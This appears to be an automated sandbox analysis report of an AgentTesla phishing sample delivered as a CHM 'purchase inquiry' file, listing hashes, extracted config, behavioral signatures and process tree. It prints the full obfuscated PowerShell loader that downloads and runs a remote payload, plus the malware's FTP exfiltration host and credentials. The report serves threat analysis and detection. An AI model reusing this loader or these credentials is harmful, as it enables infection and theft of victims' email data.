Analysis
-
max time kernel
72s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
27/10/2022, 12:14
Static task
static1
Behavioral task
behavioral1
Sample
inquiry IN-purchase no.00048075063.chm
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
inquiry IN-purchase no.00048075063.chm
Resource
win10v2004-20220812-en
General
-
Target
inquiry IN-purchase no.00048075063.chm
-
Size
13KB
-
MD5
6f6236aed55a7ce730284128bceb4d47
-
SHA1
1286c98d5e74865d04394c87dd49ba21fab25e0f
-
SHA256
6d21db2610c241baca4a885f334f9670978ba5a0a055247ff171fa5157588ff9
-
SHA512
49d64d41e1f17ba7488e74c58b116653bad749e49b9023eb3b09f70039be1848e93f2cfeee9e828c508d6c7d79775b02f86781a5a571d32ad3f7f03b05ebc888
-
SSDEEP
96:tmdZnn+YwcqkFm2wCXU0bZGLo2C/XgnLwZYCleVe+IF+kTbTFU553rc+nlq/e8Bx:tmdLwcJXhZDV/gtC8elrTFU513lqx3
Malware Config
Extracted
https://mgcpakistan.com/c12.txt
Extracted
agenttesla
Protocol: ftp- Host:
ftp://ftp.lemendoza.com - Port:
21 - Username:
[email protected] - Password:
boygirl123456
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 6 4844 powershell.exe -
Loads dropped DLL 1 IoCs
pid Process 4844 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 MSBuild.exe Key opened \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 MSBuild.exe Key opened \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 MSBuild.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4844 set thread context of 1504 4844 powershell.exe 86 -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 4844 powershell.exe 4844 powershell.exe 1504 MSBuild.exe 1504 MSBuild.exe -
Suspicious use of AdjustPrivilegeToken 44 IoCs
description pid Process Token: SeDebugPrivilege 4844 powershell.exe Token: SeIncreaseQuotaPrivilege 4844 powershell.exe Token: SeSecurityPrivilege 4844 powershell.exe Token: SeTakeOwnershipPrivilege 4844 powershell.exe Token: SeLoadDriverPrivilege 4844 powershell.exe Token: SeSystemProfilePrivilege 4844 powershell.exe Token: SeSystemtimePrivilege 4844 powershell.exe Token: SeProfSingleProcessPrivilege 4844 powershell.exe Token: SeIncBasePriorityPrivilege 4844 powershell.exe Token: SeCreatePagefilePrivilege 4844 powershell.exe Token: SeBackupPrivilege 4844 powershell.exe Token: SeRestorePrivilege 4844 powershell.exe Token: SeShutdownPrivilege 4844 powershell.exe Token: SeDebugPrivilege 4844 powershell.exe Token: SeSystemEnvironmentPrivilege 4844 powershell.exe Token: SeRemoteShutdownPrivilege 4844 powershell.exe Token: SeUndockPrivilege 4844 powershell.exe Token: SeManageVolumePrivilege 4844 powershell.exe Token: 33 4844 powershell.exe Token: 34 4844 powershell.exe Token: 35 4844 powershell.exe Token: 36 4844 powershell.exe Token: SeIncreaseQuotaPrivilege 4844 powershell.exe Token: SeSecurityPrivilege 4844 powershell.exe Token: SeTakeOwnershipPrivilege 4844 powershell.exe Token: SeLoadDriverPrivilege 4844 powershell.exe Token: SeSystemProfilePrivilege 4844 powershell.exe Token: SeSystemtimePrivilege 4844 powershell.exe Token: SeProfSingleProcessPrivilege 4844 powershell.exe Token: SeIncBasePriorityPrivilege 4844 powershell.exe Token: SeCreatePagefilePrivilege 4844 powershell.exe Token: SeBackupPrivilege 4844 powershell.exe Token: SeRestorePrivilege 4844 powershell.exe Token: SeShutdownPrivilege 4844 powershell.exe Token: SeDebugPrivilege 4844 powershell.exe Token: SeSystemEnvironmentPrivilege 4844 powershell.exe Token: SeRemoteShutdownPrivilege 4844 powershell.exe Token: SeUndockPrivilege 4844 powershell.exe Token: SeManageVolumePrivilege 4844 powershell.exe Token: 33 4844 powershell.exe Token: 34 4844 powershell.exe Token: 35 4844 powershell.exe Token: 36 4844 powershell.exe Token: SeDebugPrivilege 1504 MSBuild.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1260 hh.exe 1260 hh.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 1260 wrote to memory of 4844 1260 hh.exe 82 PID 1260 wrote to memory of 4844 1260 hh.exe 82 PID 4844 wrote to memory of 1504 4844 powershell.exe 86 PID 4844 wrote to memory of 1504 4844 powershell.exe 86 PID 4844 wrote to memory of 1504 4844 powershell.exe 86 PID 4844 wrote to memory of 1504 4844 powershell.exe 86 PID 4844 wrote to memory of 1504 4844 powershell.exe 86 PID 4844 wrote to memory of 1504 4844 powershell.exe 86 PID 4844 wrote to memory of 1504 4844 powershell.exe 86 PID 4844 wrote to memory of 1504 4844 powershell.exe 86 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 MSBuild.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 MSBuild.exe
Processes
-
C:\Windows\hh.exe"C:\Windows\hh.exe" "C:\Users\Admin\AppData\Local\Temp\inquiry IN-purchase no.00048075063.chm"1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1260 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://mgcpakistan.com/c12.txt')|P2⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4844 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1504
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
75KB
MD542b2c266e49a3acd346b91e3b0e638c0
SHA12bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1
SHA256adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29
SHA512770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81